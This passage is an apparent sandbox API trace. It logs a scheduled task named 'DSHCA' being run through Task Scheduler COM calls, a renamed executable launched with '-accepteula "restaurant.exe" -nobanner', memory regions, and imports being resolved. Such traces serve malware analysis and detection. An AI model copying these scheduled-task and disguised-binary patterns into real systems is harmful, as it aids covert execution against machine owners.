[0297.139] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.139] lstrlenW (lpString="I") returned 1 [0297.139] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.139] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|i|") returned 3 [0297.139] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|I|") returned 3 [0297.139] lstrlenW (lpString="|i|") returned 3 [0297.139] lstrlenW (lpString="|I|") returned 3 [0297.139] StrStrIW (lpFirst="|i|", lpSrch="|I|") returned="|i|" [0297.139] RtlRestoreLastWin32Error () returned 0x0 [0297.139] RtlRestoreLastWin32Error () returned 0x0 [0297.139] RtlRestoreLastWin32Error () returned 0x0 [0297.139] lstrlenW (lpString="/tn") returned 3 [0297.139] lstrlenW (lpString="-/") returned 2 [0297.139] StrChrIW (lpStart="-/", wMatch=0x5c002f) returned="/" [0297.139] lstrlenW (lpString="run") returned 3 [0297.139] lstrlenW (lpString="run") returned 3 [0297.139] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.139] lstrlenW (lpString="tn") returned 2 [0297.139] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.139] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x6, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|run|") returned 5 [0297.139] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x5, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|tn|") returned 4 [0297.139] lstrlenW (lpString="|run|") returned 5 [0297.139] lstrlenW (lpString="|tn|") returned 4 [0297.139] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0 [0297.139] RtlRestoreLastWin32Error () returned 0x490 [0297.139] lstrlenW (lpString="?") returned 1 [0297.139] lstrlenW (lpString="?") returned 1 [0297.139] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.139] lstrlenW (lpString="tn") returned 2 [0297.139] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.139] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|?|") returned 3 [0297.139] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x5, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|tn|") returned 4 [0297.139] lstrlenW (lpString="|?|") returned 3 [0297.139] lstrlenW (lpString="|tn|") returned 4 [0297.139] RtlRestoreLastWin32Error () returned 0x490 [0297.139] lstrlenW (lpString="s") returned 1 [0297.139] lstrlenW (lpString="s") returned 1 [0297.139] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.139] lstrlenW (lpString="tn") returned 2 [0297.139] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.139] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|s|") returned 3 [0297.139] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x5, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|tn|") returned 4 [0297.140] lstrlenW (lpString="|s|") returned 3 [0297.140] lstrlenW (lpString="|tn|") returned 4 [0297.140] RtlRestoreLastWin32Error () returned 0x490 [0297.140] lstrlenW (lpString="u") returned 1 [0297.140] lstrlenW (lpString="u") returned 1 [0297.140] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.140] lstrlenW (lpString="tn") returned 2 [0297.140] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.140] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|u|") returned 3 [0297.140] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x5, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|tn|") returned 4 [0297.140] lstrlenW (lpString="|u|") returned 3 [0297.140] lstrlenW (lpString="|tn|") returned 4 [0297.140] RtlRestoreLastWin32Error () returned 0x490 [0297.140] lstrlenW (lpString="p") returned 1 [0297.140] lstrlenW (lpString="p") returned 1 [0297.140] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.140] lstrlenW (lpString="tn") returned 2 [0297.140] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.140] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|p|") returned 3 [0297.140] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x5, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|tn|") returned 4 [0297.140] lstrlenW (lpString="|p|") returned 3 [0297.140] lstrlenW (lpString="|tn|") returned 4 [0297.140] RtlRestoreLastWin32Error () returned 0x490 [0297.140] lstrlenW (lpString="i") returned 1 [0297.140] lstrlenW (lpString="i") returned 1 [0297.140] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.140] lstrlenW (lpString="tn") returned 2 [0297.140] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.140] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|i|") returned 3 [0297.140] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x5, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|tn|") returned 4 [0297.140] lstrlenW (lpString="|i|") returned 3 [0297.140] lstrlenW (lpString="|tn|") returned 4 [0297.140] RtlRestoreLastWin32Error () returned 0x490 [0297.140] lstrlenW (lpString="tn") returned 2 [0297.140] lstrlenW (lpString="tn") returned 2 [0297.140] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.140] lstrlenW (lpString="tn") returned 2 [0297.140] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.140] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x5, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|tn|") returned 4 [0297.140] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x5, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|tn|") returned 4 [0297.140] lstrlenW (lpString="|tn|") returned 4 [0297.140] lstrlenW (lpString="|tn|") returned 4 [0297.140] StrStrIW (lpFirst="|tn|", lpSrch="|tn|") returned="|tn|" [0297.140] RtlRestoreLastWin32Error () returned 0x0 [0297.140] RtlRestoreLastWin32Error () returned 0x0 [0297.140] lstrlenW (lpString="DSHCA") returned 5 [0297.140] lstrlenW (lpString="-/") returned 2 [0297.141] StrChrIW (lpStart="-/", wMatch=0x5c0044) returned 0x0 [0297.141] RtlRestoreLastWin32Error () returned 0x490 [0297.141] RtlRestoreLastWin32Error () returned 0x490 [0297.141] RtlRestoreLastWin32Error () returned 0x0 [0297.141] lstrlenW (lpString="DSHCA") returned 5 [0297.141] StrChrIW (lpStart="DSHCA", wMatch=0x3a) returned 0x0 [0297.141] RtlRestoreLastWin32Error () returned 0x490 [0297.141] RtlRestoreLastWin32Error () returned 0x0 [0297.141] lstrlenW (lpString="DSHCA") returned 5 [0297.141] RtlRestoreLastWin32Error () returned 0x0 [0297.141] lstrlenW (lpString="DSHCA") returned 5 [0297.141] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0297.143] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0297.230] CoCreateInstance (in: rclsid=0x10826c0*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x10826d0*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x10ee84 | out: ppv=0x10ee84*=0x5c37f0) returned 0x0 [0297.240] TaskScheduler:ITaskService:Connect (This=0x5c37f0, serverName=0x10ee34*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0x10ee44*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0x10ee54*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0x10ee64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0297.368] TaskScheduler:ITaskService:GetFolder (in: This=0x5c37f0, Path=0x0, ppFolder=0x10ef3c | out: ppFolder=0x10ef3c*=0x5c38c8) returned 0x0 [0297.419] ITaskFolder:GetTask (in: This=0x5c38c8, Path="DSHCA", ppTask=0x10ef44 | out: ppTask=0x10ef44*=0x5c3928) returned 0x0 [0297.557] IRegisteredTask:get_State (in: This=0x5c3928, pState=0x10ef30 | out: pState=0x10ef30*=3) returned 0x0 [0297.801] IRegisteredTask:RunEx (in: This=0x5c3928, params=0x10eed8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), flags=2, sessionID=0, user=0x0, ppRunningTask=0x10ef34 | out: ppRunningTask=0x10ef34*=0x5c3998) returned 0x0 [0298.554] _memicmp (_Buf1=0x307378, _Buf2=0x1082708, _Size=0x7) returned 0 [0298.554] LoadStringW (in: hInstance=0x0, uID=0x130, lpBuffer=0x30a660, cchBufferMax=256 | out: lpBuffer="SUCCESS: Attempted to run the scheduled task \"%s\".\n") returned 0x33 [0298.554] lstrlenW (lpString="SUCCESS: Attempted to run the scheduled task \"%s\".\n") returned 51 [0298.554] _vsnwprintf (in: _Buffer=0x10ef50, _BufferCount=0x1fb, _Format="SUCCESS: Attempted to run the scheduled task \"%s\".\n", _ArgList=0x10eef4 | out: _Buffer="SUCCESS: Attempted to run the scheduled task \"DSHCA\".\n") returned 54 [0298.554] __iob_func () returned 0x77981208 [0298.554] _fileno (_File=0x77981228) returned 1 [0298.554] _errno () returned 0x5c05b0 [0298.555] _get_osfhandle (_FileHandle=1) returned 0x3c [0298.555] _errno () returned 0x5c05b0 [0298.555] GetFileType (hFile=0x3c) returned 0x2 [0298.555] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0298.555] GetFileType (hFile=0x3c) returned 0x2 [0298.555] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x10eec8 | out: lpMode=0x10eec8) returned 1 [0299.115] __iob_func () returned 0x77981208 [0299.116] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0299.116] lstrlenW (lpString="SUCCESS: Attempted to run the scheduled task \"DSHCA\".\n") returned 54 [0299.116] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x10ef50*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x10eeec, lpReserved=0x0 | out: lpBuffer=0x10ef50*, lpNumberOfCharsWritten=0x10eeec*=0x36) returned 1 [0299.116] IUnknown:Release (This=0x5c3998) returned 0x0 [0299.116] IUnknown:Release (This=0x5c3928) returned 0x0 [0299.116] TaskScheduler:IUnknown:Release (This=0x5c38c8) returned 0x0 [0299.116] TaskScheduler:IUnknown:Release (This=0x5c37f0) returned 0x0 [0299.291] exit (_Code=0) Thread: id = 1003 os_tid = 0xc9c Process: id = "148" image_name = "vidhs3md.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe" page_root = "0x5f3f6000" os_pid = "0xcac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "144" os_parent_pid = "0xc60" cmd_line = "vIDhS3md.exe -accepteula \"restaurant.exe\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10213 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10214 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10215 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10216 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 10217 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 10218 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 10219 start_va = 0x400000 end_va = 0x476fff entry_point = 0x400000 region_type = mapped_file name = "vidhs3md.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe") Region: id = 10220 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10221 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10222 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 10223 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 10224 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10225 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10226 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10227 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10228 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 10229 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10230 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 10269 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 10270 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10271 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10272 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10273 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10274 start_va = 0x480000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 10275 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10276 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10277 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10278 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 10338 start_va = 0x200000 end_va = 0x2bdfff entry_point = 0x200000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10339 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 10340 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 10341 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10342 start_va = 0x2c0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 10343 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 10344 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10345 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 10346 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10347 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10348 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10349 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10350 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 10351 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 10352 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 10353 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 10354 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 10355 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 10356 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 10357 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 10358 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 10359 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 10360 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 10361 start_va = 0x74550000 end_va = 0x745e1fff entry_point = 0x74550000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 10362 start_va = 0x74730000 end_va = 0x74737fff entry_point = 0x74730000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 10363 start_va = 0x480000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 10364 start_va = 0x5d0000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 10365 start_va = 0x480000 end_va = 0x4a9fff entry_point = 0x480000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10366 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 10367 start_va = 0x6d0000 end_va = 0x857fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 10368 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10369 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 10370 start_va = 0x860000 end_va = 0x9e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 10371 start_va = 0x9f0000 end_va = 0x1deffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 10372 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10373 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 10374 start_va = 0x480000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Thread: id = 1006 os_tid = 0xcb0 [0298.367] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75130000 [0298.368] GetProcAddress (hModule=0x75130000, lpProcName="SetEvent") returned 0x751560c0 [0298.368] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75156110 [0298.368] GetProcAddress (hModule=0x75130000, lpProcName="DeviceIoControl") returned 0x751487e0 [0298.368] GetProcAddress (hModule=0x75130000, lpProcName="DuplicateHandle") returned 0x75155f30 [0298.368] GetProcAddress (hModule=0x75130000, lpProcName="FormatMessageW") returned 0x75154a40 [0298.368] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventW") returned 0x75155fa0 [0298.368] GetProcAddress (hModule=0x75130000, lpProcName="CreateProcessW") returned 0x7514a510 [0298.368] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsW") returned 0x7514c8c0 [0298.368] GetProcAddress (hModule=0x75130000, lpProcName="GetDriveTypeW") returned 0x75156300 [0298.368] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDirectoryW") returned 0x75149a90 [0298.368] GetProcAddress (hModule=0x75130000, lpProcName="DeleteFileW") returned 0x751561b0 [0298.369] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadErrorMode") returned 0x7514fae0 [0298.369] GetProcAddress (hModule=0x75130000, lpProcName="HeapSize") returned 0x779e4f40 [0298.369] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringW") returned 0x75149a40 [0298.369] GetProcAddress (hModule=0x75130000, lpProcName="GetStringTypeW") returned 0x751479b0 [0298.369] GetProcAddress (hModule=0x75130000, lpProcName="TerminateThread") returned 0x7514fcb0 [0298.369] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x751492b0 [0298.369] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514a300 [0298.369] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileW") returned 0x75156180 [0298.369] GetProcAddress (hModule=0x75130000, lpProcName="FindResourceW") returned 0x75153a50 [0298.369] GetProcAddress (hModule=0x75130000, lpProcName="SizeofResource") returned 0x75148cb0 [0298.370] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x75155f20 [0298.370] GetProcAddress (hModule=0x75130000, lpProcName="SetLastError") returned 0x75142af0 [0298.370] GetProcAddress (hModule=0x75130000, lpProcName="LoadResource") returned 0x751478f0 [0298.370] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x75142db0 [0298.370] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcess") returned 0x75142da0 [0298.370] GetProcAddress (hModule=0x75130000, lpProcName="LockResource") returned 0x75147a50 [0298.370] GetProcAddress (hModule=0x75130000, lpProcName="GetCommandLineW") returned 0x7514a4b0 [0298.370] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleW") returned 0x75149660 [0298.370] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryW") returned 0x7514a0b0 [0298.370] GetProcAddress (hModule=0x75130000, lpProcName="GetStdHandle") returned 0x7514a060 [0298.370] GetProcAddress (hModule=0x75130000, lpProcName="LocalFree") returned 0x751487c0 [0298.371] GetProcAddress (hModule=0x75130000, lpProcName="LocalAlloc") returned 0x75148840 [0298.371] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75147940 [0298.371] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleFileNameW") returned 0x75149560 [0298.371] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleScreenBufferInfo") returned 0x751569c0 [0298.371] GetProcAddress (hModule=0x75130000, lpProcName="GetFileType") returned 0x75156390 [0298.371] GetProcAddress (hModule=0x75130000, lpProcName="OutputDebugStringW") returned 0x75171c30 [0298.371] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleW") returned 0x751568e0 [0298.372] GetProcAddress (hModule=0x75130000, lpProcName="WriteConsoleW") returned 